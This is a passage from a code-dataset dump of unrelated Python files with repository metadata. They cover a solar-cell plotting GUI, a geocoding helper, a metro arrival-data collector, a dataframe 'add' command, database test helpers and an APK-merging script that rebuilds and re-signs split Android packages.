dump_json_activator(self) -> None:\n        \"\"\"\n        Dump json into a file in the project root folder\n        :return: None\n        \"\"\"\n        self.dump_json = bool(self.additional_settings.dump_json_checkbox.get())\n\n    def exit(self) -> None:\n        \"\"\"\n        Close Tkinter and script\n        :return: None\n        \"\"\"\n        self.quit()\n\n    @staticmethod\n    def change_appearance_mode_event(new_appearance_mode: str) -> None:\n        \"\"\"\n        Change the Tkinter appearance mode\n        :param new_appearance_mode: Type of appearance mode\n        :return: None\n        \"\"\"\n        ctk.set_appearance_mode(new_appearance_mode)\n\n    def final_output(self, state) -> None:\n        \"\"\"\n        Choose the state to work on\n        :param state: Selected some files or all the files\n        :return: None\n        \"\"\"\n        if not self.file_directory:\n            messagebox.showerror('Warning!', \"Choose a folder to continue!\")\n            return\n        items = []\n        if state == \"Selected\":\n            # This should fetch selected items and not all top-level items\n            items = list(self.table_frame.files_table.selection())\n        elif state == \"All\":\n            if self.aging_mode and self.timeline_df is None:\n                messagebox.showerror('Warning!', \"For aging mode the timeline must be set!\")\n                return\n            # This should fetch all items in the tree, including children of top-level items\n            items = list(self.table_frame.files_table.get_children(''))\n            for top_level_item in items:\n                child_items = list(self.table_frame.files_table.get_children(top_level_item))\n                items.extend(child_items)\n        matched = self.table_frame.devices_by_folder(items)\n        matched_sorted = sort_inner_keys(matched)\n        DevicePlotter(parent=self, matched_devices=matched_sorted)\n        self.exit()\n\n    def expand_collapse(self, expand=True) -> None:\n        \"\"\"\n        Only expand/collapse item in treeview\n        :param expand: expand if True, collapse if False\n        :return: None\n        \"\"\"\n        for item in self.table_frame.files_table.get_children():\n            self.treeview_expand_collapse(item, expand, select=False)\n\n    def treeview_expand_collapse(self, item, expand_collapse, select=False) -> None:\n        \"\"\"\n        Expand/collapse treeview. 
Select all nested elements in a table and expand parental ones\n        :param select: select expanded values\n        :param expand_collapse: True for expanding, False - collapsing\n        :param item: Item to select\n        :return: None\n        \"\"\"\n        # Expand items\n        self.table_frame.files_table.item(item, open=expand_collapse)\n        if expand_collapse and select:\n            self.table_frame.files_table.selection_add(item)\n        # Select all nested (children) items\n        if self.table_frame.files_table.get_children(item):\n            for item_inner in self.table_frame.files_table.get_children(item):\n                self.treeview_expand_collapse(item_inner, expand_collapse, select)\n\n    def ask_directory(self) -> None:\n        \"\"\"\n        Ask for a directory via Tkinter's built-in dialog and store the chosen path\n        :return: None\n        \"\"\"\n        if not self.additional_settings.in_start_pos:\n            self.additional_settings.animate_additional_settings(step=1)\n        if not self.slide_frame.in_start_pos:\n            self.slide_frame.animate(step=1)\n        self.file_directory = filedialog.askdirectory(mustexist=True)\n        if self.file_directory == \"\":\n            self.label_1.configure(text='Specify a directory with images to work with')\n            return\n        self.list_files()\n        self.label_1.configure(text=self.file_directory)\n\n    def specify_timeline(self):\n        path_to_timeline = filedialog.askopenfilename()\n        if path_to_timeline == \"\":\n            self.slide_frame.time_label.configure(text='Aging time: undefined.\\n Specify the path')\n            return\n        self.timeline_df = TimeLineProcessor(path_to_check=path_to_timeline).check_the_path()\n        if self.timeline_df is None:\n            self.slide_frame.time_label.configure(text='Aging time: failed to read.\\n Specify the path')\n        else:\n            max_time = round(self.timeline_df.max().values[0])\n            self.slide_frame.time_label.configure(text=f'Aging time: {max_time} h')\n\n    def set_potentiostat(self, event):\n        \"\"\"\n        Set potentiostat for filtering all unnecessary files\n        :param event: Chosen potentiostat from the ComboBox, or 'All'\n        \"\"\"\n        self.potentiostat = event\n        self.list_files()\n\n    def list_files(self):\n        \"\"\"\n        Update and fill the file table with filtered files\n        \"\"\"\n        if self.file_directory == \"\":\n            return\n        # Check if there are any items in the treeview\n        for i in self.table_frame.files_table.get_children():\n            self.table_frame.files_table.delete(i)\n        abspath = os.path.abspath(self.file_directory).replace('\\\\', '/')\n        root_node = self.table_frame.files_table.insert('', 'end', text=os.path.basename(abspath), open=True)\n        self.added_iv.clear()\n        self.process_directory(root_node, abspath)\n\n    def process_directory(self, parent, path, is_root_call=True):\n        \"\"\"\n        Insert files filtered by extension type into the table and the file list, including nested folders.\n        Folders are shown only if they contain required files.\n        :param parent: Parent folder\n        :param path: path to work with\n        :param is_root_call: A boolean flag,\n         that checks whether the current call to process_directory is the initial (root-level) call.\n        :return: None\n        \"\"\"\n        depth = 1 if self.aging_mode else 0\n        potentiostat_checker = PotentiostatFileChecker(parent=self, potentiostat_choice=self.potentiostat)\n\n        for file in os.listdir(path):\n            abspath = os.path.join(path, file).replace('\\\\', '/')\n            b = path.replace(self.file_directory, '').count('/')\n            if os.path.isfile(abspath):\n                checking = potentiostat_checker.check_file(abspath)\n                if checking[0]:  # Insert a file only if it's a potentiostat file\n                    potentiostat = checking[2]\n                    # data = [potentiostat, checking[1], abspath]\n                    data = [potentiostat, checking[-1]['Unit'], abspath]\n                    
folder_name = os.path.basename(path)\n                    if folder_name not in self.added_iv:\n                        self.added_iv[folder_name] = {}\n                    self.added_iv[folder_name][file] = {\n                        \"path\": abspath,\n                        'measurement device': potentiostat,\n                        'encoding': checking[1],\n                        'Sweeps': checking[3][\"Counts\"],\n                        'data': checking[3][\"Data\"],\n                        'unit': checking[3]['Unit'],\n                        'Used files': file,\n                        'Active area': None,\n                        'Light Intensity': None,\n                        'Distance to light source': None,\n                    }\n                    self.table_frame.files_table.insert(parent=parent, index=tk.END, text=file, values=data,\n                                                        tags='file')\n            if os.path.isdir(abspath):\n                device_detected = False\n                for dir_path, dir_names, files in os.walk(abspath):\n                    for filename in files:\n                        f_name = os.path.join(dir_path, filename).replace('\\\\', '/')\n                        checking = potentiostat_checker.check_file(f_name)\n                        if checking[0]:\n                            device_detected = True\n                if device_detected:\n                    if b == depth:  # Nested folders only one level deep are\n                        # allowed for the processed folders\n                        return messagebox.showerror('Warning!', f\"Too many sub folders in\"\n                                                               f\" a folder {abspath}\")\n                    oid = self.table_frame.files_table.insert(parent, 'end', text=file, open=False, tags='folder',\n                                                              values=['', '', abspath])\n                    self.process_directory(oid, abspath, is_root_call=False)\n        # Only run the following lines if it's the root call\n        if is_root_call:\n            self.table_frame.construct_active_areas_entries(data=self.added_iv, path=self.file_directory)\n","repo_name":"Rusya665/Solar_cells_measurements_plotting","sub_path":"JV_plotter_GUI/Main_frame.py","file_name":"Main_frame.py","file_ext":"py","file_size_in_byte":12126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26731386514","text":"import urllib \nfrom urllib.request import urlopen \nimport json \n \ndef getGeoForAddress(address): \n    addressUrl = \"http://maps.googleapis.com/maps/api/geocode/json?address=\" + address \n    addressUrlQuote = urllib.parse.quote(addressUrl, ':?=/') \n    response = urlopen(addressUrlQuote).read().decode('utf-8') \n    responseJson = json.loads(response) \n\n    lat = responseJson.get('results')[0]['geometry']['location']['lat'] \n    lng = responseJson.get('results')[0]['geometry']['location']['lng'] \n    print(address + ': %f, %f' %(lat, lng)) \n    return [lat, lng] \n\ngetGeoForAddress('South Waverly, PA')\ngetGeoForAddress('Boardman, OR')\ngetGeoForAddress('Ilwaco, WA')\n","repo_name":"YanHanOOP/MCM-ICM-Service-Outsource","sub_path":"MCM-ICM/city_info.py","file_name":"city_info.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"35587504049","text":"# metroArrival.py\nimport requests\nimport requests.exceptions\nimport csv\nimport datetime\nimport os\nfrom time import sleep\n\n\ndef getMetroArrival():\n    # list in which the line names are stored\n    lineNames = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'Suin', 'Bundang', 'GyeonguiJoungang', 'Airport', 'GyeongChun']\n    # list in which line codes and station IDs will be stored\n    idTable = []\n    # for each line\n    for lineName in lineNames:\n        # list to store the station IDs of each line\n        stationIds = []\n        # open the file that stores line codes, station IDs, etc.\n        file = open('data/metroId/line' + lineName + '.csv', 'r', encoding='euc-kr')\n        csvReader = csv.reader(file)\n        # for each row\n        for line in csvReader:\n            # set the line code\n            subwayNum = line[0]\n            # append the station ID to stationIds\n            stationIds.append({'stationId': line[1]})\n        # add the info of this line to idTable\n        idTable.append({'subwayNum': subwayNum, 'stationIds': stationIds})\n        file.close()\n    # infinite loop\n    while True:\n        # does not run after 2 AM and before 4 AM\n        if datetime.datetime.now().hour < 2 or datetime.datetime.now().hour >= 4:\n            # address of the api to call\n            url = 'http://m.bus.go.kr/mBus/subway/getStatnTrainInfo.bms?'\n            # for each line\n            for row in idTable:\n                # line code\n                subwayNum = row['subwayNum']\n                # for each station of this line\n                for stationIds in row['stationIds']:\n                    # station ID\n                    stationId = stationIds['stationId']\n                    # current time\n                    now = datetime.datetime.now()\n                    # convert to the format 20190610\n                    date = now.strftime(\"%Y%m%d\")\n                    # current day of week (0: Monday ~ 6: Sunday)\n                    weekday = now.weekday()\n                    # from 0 AM to 2 AM trains follow the previous day's timetable, so treat it as the previous day\n                    if now.hour >= 0 and now.hour <= 2:\n                        weekday = weekday - 1\n                    # if stepping back from Monday gives -1, treat it as Sunday\n                    if weekday == -1:\n                        weekday = 6\n                    # if it is a weekday\n                    if weekday >= 0 and weekday <= 4:\n                        # set weekday to 1\n                        weekday = 1\n                    # if it is Saturday\n                    elif weekday == 5:\n                        # set weekday to 2\n                        weekday = 2\n                    # if it is Sunday\n                    else:\n                        # set weekday to 3\n                        weekday = 3\n                    try:\n                        # request the api with the POST method\n                        response = requests.post(url + 'subwayId={}&statnId={}'.format(subwayNum, stationId))\n                    # exception handling for communication errors with the server\n                    except requests.exceptions.ConnectionError:\n                        # report that an error occurred\n                        print('Timeout Error!')\n                    # store the json response\n                    result = response.json()\n                    # skip if no train is stopping at this station\n                    if result['resultList'] is None:\n                        continue\n                    # if the directory to store the collected data does not exist\n                    if not os.path.exists('data/location/'+date):\n                        # create the directory\n                        os.mkdir('data/location/'+date)\n                    # if a file for the collected line already exists\n                    if os.path.exists('data/location/'+date+'/'+subwayNum+'.csv'):\n                        # open in append mode\n                        file = open('data/location/' + date + '/' + subwayNum + '.csv', 'a', encoding='euc-kr', newline='')\n                    # if the file does not exist\n                    else:\n                        # open in write mode\n                        file = open('data/location/'+date+'/'+subwayNum+'.csv', 'w', encoding='euc-kr', newline='')\n                    csvWriter = csv.writer(file)\n                    # for each row of the result\n                    for resultRow in result['resultList']:\n                        # up/down direction\n                        updownCode = ''\n                        # skip if the train has not arrived at the station.\n                        if resultRow['trainSttus'] != '1':\n                            continue\n                        # some lines use different up/down conventions in the actual timetable and in the api,\n                        # so if this line uses a different convention\n                        if subwayNum in ['1001', '1002', '1003', '1004', '1005', '1006', '1007', '1008', '1063', '1067', '1071', '1075']:\n                            if resultRow['updnLine'] == '하행' or resultRow['updnLine'] == '내선':\n                                updownCode = '1'\n                            else:\n                                updownCode = '2'\n                        # if this line uses the same convention\n                        else:\n                            if resultRow['updnLine'] == '상행' or resultRow['updnLine'] == '내선':\n                                updownCode = '1'\n                            else:\n                                updownCode = '2'\n                        # store only hours, minutes and seconds in arrivedTime.\n                        arrivedTime = resultRow['arvlDt'][11:19]\n                        # train number\n                        trainNo = resultRow['trainNo']\n                        # destination station name\n                        destination = resultRow['trainLineNm']\n                        # write to the file\n                        csvWriter.writerow([stationId, trainNo, destination, arrivedTime, weekday, updownCode])\n                        print(resultRow)\n                    file.close()\n                    # sleep 0.1s per station to avoid overload and excessive duplicate data\n                    sleep(0.1)\n\n\ngetMetroArrival()\n\n\n","repo_name":"JJuOn/HellDangLine","sub_path":"metroArrival.py","file_name":"metroArrival.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
{"seq_id":"42294037199","text":"import numpy as np\nimport pandas as pd\nfrom otlang.sdk.syntax import Positional, OTLType\nfrom pp_exec_env.base_command import BaseCommand, Syntax\n\n\nclass AddCommand(BaseCommand):\n    \"\"\"\n    Make an addition of two columns of a dataframe\n    a, b - the columns or numbers to be added\n    | add a b - creates a new df\n\n    | add a b as c - creates new column \"c\" in the old df\n    \"\"\"\n\n    syntax = Syntax(\n        [\n            Positional(\"first_argument\", required=True, otl_type=OTLType.ALL),\n            Positional(\"second_argument\", required=True, 
otl_type=OTLType.ALL),\n ],\n )\n use_timewindow = False # Does not require time window arguments\n idempotent = True # Does not invalidate cache\n\n def transform(self, df: pd.DataFrame) -> pd.DataFrame:\n self.log_progress(\"Start add command\")\n # that is how you get arguments\n first_add_argument = self.get_arg(\"first_argument\")\n if isinstance(first_add_argument.value, str):\n first_add = df[first_add_argument.value]\n else:\n first_add = first_add_argument.value\n\n second_add_argument = self.get_arg(\"second_argument\")\n if isinstance(second_add_argument.value, str):\n second_add = df[second_add_argument.value]\n else:\n second_add = second_add_argument.value\n result_column_name = second_add_argument.named_as\n\n if isinstance(first_add, (int, float)) and isinstance(second_add, (int, float)):\n if result_column_name != \"\" and not df.empty:\n first_add = np.array([first_add] * df.shape[0])\n second_add = np.array([second_add] * df.shape[0])\n else:\n first_add = np.array([first_add])\n second_add = np.array([second_add])\n\n\n self.logger.debug(f\"Command add get first positional argument = {first_add_argument.value}\")\n self.logger.debug(\n f\"Command add get second positional argument = {second_add_argument.value}\"\n )\n\n if result_column_name != \"\":\n if not df.empty:\n df[result_column_name] = first_add + second_add\n else:\n df = pd.DataFrame({result_column_name: first_add + second_add})\n self.logger.debug(f\"New column name: {result_column_name}\")\n\n else:\n df = pd.DataFrame(\n {\n f\"add_{first_add_argument.value}_{second_add_argument.value}\": first_add + second_add\n }\n )\n self.log_progress(\"Addition is completed.\", stage=1, total_stages=1)\n return df\n","repo_name":"ISGNeuroTeam/pp_cmd_add","sub_path":"add/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23890442612","text":"from unittest.mock import Mock, patch\nimport pytest\n\nfrom dysql import set_default_connection_parameters, databases\n\n\n@pytest.fixture(name='mock_create_engine')\ndef mock_create_engine_fixture():\n create_mock = patch('dysql.databases.sqlalchemy.create_engine')\n try:\n yield create_mock.start()\n finally:\n create_mock.stop()\n\n\ndef setup_mock_engine(mock_create_engine):\n \"\"\"\n build up the basics of a mock engine for the database\n :return: mocked engine for use and manipulation in testing\n \"\"\"\n mock_engine = Mock()\n mock_engine.connect().execution_options().__enter__ = Mock()\n mock_engine.connect().execution_options().__exit__ = Mock()\n set_default_connection_parameters('fake', 'user', 'password', 'test')\n\n # Clear out the databases before attempting to mock anything\n databases.DatabaseContainerSingleton().clear()\n mock_create_engine.return_value = mock_engine\n return mock_engine\n\n\ndef _verify_query_params(mock_engine, expected_query, expected_args):\n _verify_query(mock_engine, expected_query)\n _verify_query_args(mock_engine, expected_args)\n\n\ndef _verify_query(mock_engine, expected_query):\n execute_call = mock_engine.connect.return_value.execution_options.return_value.execute\n execute_call.assert_called()\n\n query = execute_call.call_args[0][0].text\n assert query == expected_query\n\n\ndef _verify_query_args(mock_engine, expected_args):\n execute_call = mock_engine.connect.return_value.execution_options.return_value.execute\n query_args = execute_call.call_args[0][1]\n\n assert query_args\n for 
expected_key in expected_args:\n expected_value = expected_args[expected_key]\n assert query_args.get(expected_key)\n assert expected_value == query_args[expected_key]\n","repo_name":"adobe/dy-sql","sub_path":"dysql/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"74026197265","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport platform\nimport shutil\nimport sys\nfrom distutils.spawn import find_executable\n\nfrom subprocess import call, STDOUT\ntry:\n from subprocess import DEVNULL\nexcept ImportError:\n import os\n DEVNULL = open(os.devnull, 'wb')\n\n\nconst_dir_tmp = \".mergeapks\"\nconst_file_target_file = \"target\"\nconst_file_result_file = \"result\"\nconst_ext_apk = \".apk\"\nconst_apk_file_apktool_config = 'apktool.yml'\nconst_sign_config_properties_file = 'mergeapks.sign.properties'\n\n\ndef print_help():\n print(\"\")\n print(\"MergeApks is a tool that merges multiple .apk files of the same application but with different resource sets (native libraries, locales, dpi) into one single universal .apk file\")\n print(\"Usage: python mergeapks.py PATH_TO_FILE_01.apk PATH_TO_FILE_02.apk PATH_TO_FILE_03.apk ...\")\n print(\"\")\n\n\ndef get_param_apk_file_name(apk_number):\n return sys.argv[apk_number]\n\n\ndef get_param_apk_abs_path(apk_number):\n return os.path.abspath(get_param_apk_file_name(apk_number))\n\n\ndef check_sys_args():\n if len(sys.argv) < 3:\n return False\n\n for apk_number in range(1, len(sys.argv)):\n apk_file_name = get_param_apk_file_name(apk_number)\n if not apk_file_name.endswith(const_ext_apk):\n return False\n abspath_to_apk_file = os.path.abspath(apk_file_name)\n if not os.path.exists(abspath_to_apk_file):\n return False\n\n return True\n\n\ndef execute_command_os_system(command):\n rc = os.system(command)\n return rc\n\n\ndef execute_command_subprocess(command_tokens_list):\n rc = call(command_tokens_list, stdout=DEVNULL, stderr=STDOUT)\n return rc\n\n\ndef is_windows():\n return platform.system() == \"Windows\"\n\n\ndef windows_hide_file(file_path):\n execute_command_subprocess([\"attrib\", \"+h\", file_path])\n\n\ndef create_or_recreate_dir(dir_path):\n if os.path.exists(dir_path):\n if os.path.isdir(dir_path):\n shutil.rmtree(dir_path)\n else:\n os.remove(dir_path)\n os.mkdir(dir_path)\n if is_windows():\n windows_hide_file(dir_path)\n\n\ndef check_if_executable_exists_in_path(executable):\n path_to_cmd = find_executable(executable)\n return path_to_cmd is not None\n\n\ndef create_tmp_dir(working_dir):\n path_dir_tmp = os.path.abspath(os.path.join(working_dir, const_dir_tmp))\n create_or_recreate_dir(path_dir_tmp)\n return path_dir_tmp\n\n\ndef file_split_name_and_extension(file_path):\n split = os.path.splitext(file_path)\n return split[0], split[1]\n\n\ndef get_do_not_compress_lines(config_file_lines):\n index_start = -1\n index_end = -1\n result = list()\n start_block_literal = 'doNotCompress:'\n prefix_target_line = '- '\n opened = False\n for index, line in enumerate(config_file_lines):\n if not opened and line.startswith(start_block_literal):\n opened = True\n if index_end == -1 and index_start == -1:\n index_start = index + 1\n elif opened and line.startswith(prefix_target_line):\n result.append(line)\n elif opened and not line.startswith(prefix_target_line):\n if index_start != -1 and index_end == -1:\n index_end = index - 1\n break\n result.sort()\n return result, index_start, 
index_end\n\n\ndef parse_apktool_config(config_file_path):\n config_file_lines = list()\n with open(config_file_path, 'r') as file:\n config_file_lines = file.readlines()\n\n do_not_compress_lines, do_not_compress_index_start, do_not_compress_index_end = get_do_not_compress_lines(config_file_lines)\n\n properties = dict()\n properties['lines_all'] = config_file_lines\n properties['lines_do_not_compress'] = do_not_compress_lines\n properties['lines_do_not_compress_index_start'] = do_not_compress_index_start\n properties['lines_do_not_compress_index_end'] = do_not_compress_index_end\n\n return properties\n\n\ndef insert_new_lines_do_not_compress(config_file_path, lines_to_insert):\n file_apktool_config = parse_apktool_config(config_file_path)\n do_not_compress_lines_original = file_apktool_config['lines_do_not_compress']\n\n do_not_compress_lines_updated = set()\n do_not_compress_lines_updated.update(do_not_compress_lines_original)\n do_not_compress_lines_updated.update(lines_to_insert)\n do_not_compress_lines_updated = list(do_not_compress_lines_updated)\n do_not_compress_lines_updated.sort()\n\n config_file_lines_original = file_apktool_config['lines_all']\n config_file_lines_index_start = file_apktool_config['lines_do_not_compress_index_start']\n config_file_lines_index_end = file_apktool_config['lines_do_not_compress_index_end']\n config_file_lines_updated = list()\n for config_file_line in config_file_lines_original:\n config_file_lines_updated.append(config_file_line)\n config_file_lines_updated[config_file_lines_index_start:config_file_lines_index_end] = do_not_compress_lines_updated\n\n with open(config_file_path, 'w') as file:\n file.writelines(config_file_lines_updated)\n\n\ndef merge_dir_contents(path_src, path_dst):\n follow_symlinks_on_source_files = False\n replace_if_files_already_exist = False\n skip_file_io_errors = True\n\n file_names = os.listdir(path_src)\n if not os.path.isdir(path_dst):\n os.makedirs(path_dst)\n\n for file_name in file_names:\n file_src = os.path.join(path_src, file_name)\n file_dst = os.path.join(path_dst, file_name)\n try:\n if follow_symlinks_on_source_files and os.path.islink(file_src):\n symlink = os.readlink(file_src)\n os.symlink(symlink, file_dst)\n elif os.path.isdir(file_src):\n merge_dir_contents(file_src, file_dst)\n else:\n if not os.path.exists(file_dst) or replace_if_files_already_exist:\n # print(\"COPY %s TO %s\" % (file_src, file_dst))\n shutil.copy2(file_src, file_dst)\n except Exception as e:\n if not skip_file_io_errors:\n raise e\n try:\n shutil.copystat(path_src, path_dst)\n except Exception as e:\n if not skip_file_io_errors:\n raise e\n\n\ndef merge_apk_contents(dir_apk_main, dir_apk_secondary):\n directories_to_merge = ['assets', 'lib', 'res', 'unknown', 'kotlin']\n\n for dir_to_merge in directories_to_merge:\n path_src = os.path.join(dir_apk_secondary, dir_to_merge)\n path_dst = os.path.join(dir_apk_main, dir_to_merge)\n if os.path.exists(path_src) and os.path.isdir(path_src):\n merge_dir_contents(path_src, path_dst)\n\n path_file_config_src = os.path.join(dir_apk_secondary, const_apk_file_apktool_config)\n path_file_config_dst = os.path.join(dir_apk_main, const_apk_file_apktool_config)\n config_src = parse_apktool_config(path_file_config_src)\n insert_new_lines_do_not_compress(path_file_config_dst, config_src['lines_do_not_compress'])\n\n\ndef unpack_apk(path_dir_tmp, apk_file, number_current, number_total):\n print('[*] unpacking %d of %d' % (number_current, number_total))\n os.chdir(path_dir_tmp)\n rc = 
execute_command_subprocess(['apktool', 'd', '-s', apk_file])\n    if rc != 0:\n        raise Exception(\"failed to unpack %s\" % apk_file)\n    os.remove(os.path.join(path_dir_tmp, apk_file))\n\n\ndef pack_apk(path_dir_tmp, main_apk_dir):\n    print('[*] repack apk')\n    os.chdir(path_dir_tmp)\n    rc = execute_command_subprocess(['apktool', 'b', main_apk_dir])\n    if rc != 0:\n        raise Exception(\"failed to pack apk\")\n\n    built_apk_file_path = os.path.join(path_dir_tmp, main_apk_dir, 'dist', '%s%s' % (os.path.basename(main_apk_dir), const_ext_apk))\n    if not os.path.exists(built_apk_file_path):\n        raise Exception(\"result apk not found\")\n\n    build_apk_target_file = os.path.join(path_dir_tmp, '%s%s' % (const_file_target_file, const_ext_apk))\n    if os.path.exists(build_apk_target_file):\n        os.remove(build_apk_target_file)\n\n    shutil.copy(built_apk_file_path, build_apk_target_file)\n\n\ndef zipalign_apk(path_dir_tmp):\n    print('[*] zipalign apk')\n    os.chdir(path_dir_tmp)\n\n    built_apk_file_path = os.path.join(path_dir_tmp, const_file_target_file + const_ext_apk)\n    if not os.path.exists(built_apk_file_path):\n        raise Exception(\"result apk not found\")\n\n    prefix_aligned = 'aligned_'\n    built_apk_file_aligned_path = os.path.join(path_dir_tmp, prefix_aligned + const_file_target_file + const_ext_apk)\n    if os.path.exists(built_apk_file_aligned_path):\n        os.remove(built_apk_file_aligned_path)\n\n    rc = execute_command_subprocess(['zipalign', '-p', '-f', '4', built_apk_file_path, built_apk_file_aligned_path])\n    if rc != 0:\n        raise Exception(\"failed to zipalign apk\")\n    if not os.path.exists(built_apk_file_aligned_path):\n        raise Exception(\"failed to zipalign apk\")\n\n    os.remove(built_apk_file_path)\n    shutil.move(built_apk_file_aligned_path, built_apk_file_path)\n\n\ndef sign_apk(path_dir_tmp, sign_config):\n    build_apk_target_file = os.path.join(path_dir_tmp, '%s%s' % (const_file_target_file, const_ext_apk))\n    if not os.path.exists(build_apk_target_file):\n        raise Exception(\"result apk not found\")\n\n    print('[*] resign apk')\n    os.chdir(path_dir_tmp)\n    rc = execute_command_subprocess(['apksigner', 'sign', '--ks', sign_config['sign.keystore.file'], '--ks-pass', 'pass:%s' % sign_config['sign.keystore.password'], '--ks-key-alias', sign_config['sign.key.alias'], '--key-pass', 'pass:%s' % sign_config['sign.key.password'], build_apk_target_file])\n    if rc != 0:\n        raise Exception(\"failed to sign apk file\")\n\n\ndef delete_file_if_exists(path_to_file):\n    if os.path.exists(path_to_file):\n        os.remove(path_to_file)\n\n\ndef delete_signature_related_files(path_to_main_apk):\n    delete_file_if_exists(os.path.join(path_to_main_apk, 'original', 'META-INF', 'BNDLTOOL.RSA'))\n    delete_file_if_exists(os.path.join(path_to_main_apk, 'original', 'META-INF', 'BNDLTOOL.SF'))\n    delete_file_if_exists(os.path.join(path_to_main_apk, 'original', 'META-INF', 'MANIFEST.MF'))\n\n\ndef update_main_manifest_file(path_main_apk):\n    path_manifest = os.path.join(path_main_apk, 'AndroidManifest.xml')\n    data = None\n\n    application_property_splits_required_from = ' android:isSplitRequired=\"true\" '\n    application_property_splits_required_to = ' '\n    # NOTE: the two meta-data selector strings below were lost to tag stripping in\n    # the extracted source; they are reconstructed from the variable names and are\n    # an assumption about the exact elements Google Play inserts\n    metadata_google_play_splits_required_from = '<meta-data android:name=\"com.android.vending.splits.required\" android:value=\"true\"/>'\n    metadata_google_play_splits_required_to = ''\n    metadata_google_play_splits_list_from = '<meta-data android:name=\"com.android.vending.splits\" android:resource=\"@xml/splits0\"/>'\n    metadata_google_play_splits_list_to = ''\n    metadata_google_play_stamp_type_from = 'android:value=\"STAMP_TYPE_DISTRIBUTION_APK\"'\n    metadata_google_play_stamp_type_to = 'android:value=\"STAMP_TYPE_STANDALONE_APK\"'\n\n    with open(path_manifest, 'r') as file:\n        data = file.read()\n    data = data.replace(application_property_splits_required_from, application_property_splits_required_to)\n    data = data.replace(metadata_google_play_splits_required_from, metadata_google_play_splits_required_to)\n    data = data.replace(metadata_google_play_splits_list_from, metadata_google_play_splits_list_to)\n    data = data.replace(metadata_google_play_stamp_type_from, metadata_google_play_stamp_type_to)\n    with open(path_manifest, 'w') as file:\n        file.write(data)\n\n\ndef load_sign_properties():\n    path_sign_config_file = os.path.abspath(os.path.join(os.getcwd(), const_sign_config_properties_file))\n    if not os.path.exists(path_sign_config_file):\n        path_sign_config_file = os.path.abspath(os.path.join(os.path.expanduser('~'), const_sign_config_properties_file))\n    if not os.path.exists(path_sign_config_file):\n        return None\n\n    sign_config_file_lines = list()\n    with open(path_sign_config_file, 'r') as sign_config_file:\n        sign_config_file_lines = sign_config_file.readlines()\n\n    properties = dict()\n    for line in sign_config_file_lines:\n        checked_line = line.strip().replace('\\r', '').replace('\\n', '')\n        if checked_line is None or checked_line == '' or line.startswith('#'):\n            continue\n        line_parts = checked_line.split('=')\n        if len(line_parts) != 2:\n            continue\n        property_key = line_parts[0].strip()\n        property_value = line_parts[1].strip()\n        properties[property_key] = property_value\n\n    if not 'sign.enabled' in properties.keys() or properties['sign.enabled'].lower() != 'true':\n        return None\n    if 'sign.keystore.file' not in properties.keys() or 'sign.keystore.password' not in properties.keys() or 'sign.key.alias' not in properties.keys() or 'sign.key.password' not in properties.keys():\n        return None\n    keystore_file = properties['sign.keystore.file']\n    if keystore_file == '' or not os.path.exists(keystore_file) or os.path.isdir(keystore_file):\n        return None\n    if properties['sign.keystore.password'] == '' or properties['sign.key.alias'] == '' or properties['sign.key.password'] == '':\n        return None\n\n    return properties\n\n\ndef build_single_apk(path_to_tmp_dir, path_to_main_apk_dir, should_sign_apk, sign_config):\n    pack_apk(path_to_tmp_dir, path_to_main_apk_dir)\n    zipalign_apk(path_to_tmp_dir)\n    if should_sign_apk:\n        sign_apk(path_to_tmp_dir, sign_config)\n\n\ndef copy_single_apk_to_working_dir(path_to_tmp_dir, path_to_working_dir, target_name):\n    file_src = os.path.join(path_to_tmp_dir, const_file_target_file + const_ext_apk)\n    if not os.path.exists(file_src) or os.path.isdir(file_src):\n        raise Exception(\"result apk file not found\")\n\n    file_dst = os.path.join(path_to_working_dir, target_name + const_ext_apk)\n    if os.path.exists(file_dst):\n        if os.path.isdir(file_dst):\n            shutil.rmtree(file_dst)\n        else:\n            os.remove(file_dst)\n\n    shutil.copy(file_src, file_dst)\n\n\ndef main():\n    if not check_sys_args():\n        print_help()\n        exit(-1)\n\n    tested_binary = \"apktool\"\n    if not check_if_executable_exists_in_path(tested_binary):\n        print(\"executable %s not found in $PATH, please install it before running mergeapks.py\" % tested_binary)\n        exit(-2)\n\n    tested_binary = \"zipalign\"\n    if not check_if_executable_exists_in_path(tested_binary):\n        print(\"executable %s not found in $PATH, please install it before running mergeapks.py\" % tested_binary)\n        exit(-2)\n\n    sign_properties = load_sign_properties()\n    should_sign_apk = sign_properties is not None\n    if should_sign_apk:\n        tested_binary = \"apksigner\"\n        if not check_if_executable_exists_in_path(tested_binary):\n            print(\"executable %s not found in $PATH, please 
install it before running mergeapks.py\" % tested_binary)\n            exit(-2)\n\n    print('[*] start')\n\n    cwd = os.path.abspath(os.path.curdir)\n    path_dir_tmp = create_tmp_dir(cwd)\n    apk_count = len(sys.argv) - 1\n    apk_numbers_range = range(1, len(sys.argv))\n\n    files_apk = list()\n    files_apk_abs_paths = list()\n    files_apk_original_names = list()\n    paths_target_apk_files = list()\n    paths_target_apk_dirs = list()\n    for apk_number in apk_numbers_range:\n        apk_file_name = get_param_apk_file_name(apk_number)\n        original_file_name, original_file_extension = file_split_name_and_extension(apk_file_name)\n        apk_file_abs_path = get_param_apk_abs_path(apk_number)\n        files_apk.append(apk_file_name)\n        files_apk_abs_paths.append(apk_file_abs_path)\n        files_apk_original_names.append(original_file_name)\n        target_apk_file_abs_path = os.path.join(path_dir_tmp, apk_file_name)\n        target_apk_dir_abs_path = os.path.join(path_dir_tmp, original_file_name)\n        paths_target_apk_files.append(target_apk_file_abs_path)\n        paths_target_apk_dirs.append(target_apk_dir_abs_path)\n        shutil.copy(apk_file_abs_path, target_apk_file_abs_path)\n\n    for index, target_apk in enumerate(paths_target_apk_files):\n        unpack_apk(path_dir_tmp, target_apk, index + 1, apk_count)\n\n    path_apk_main = 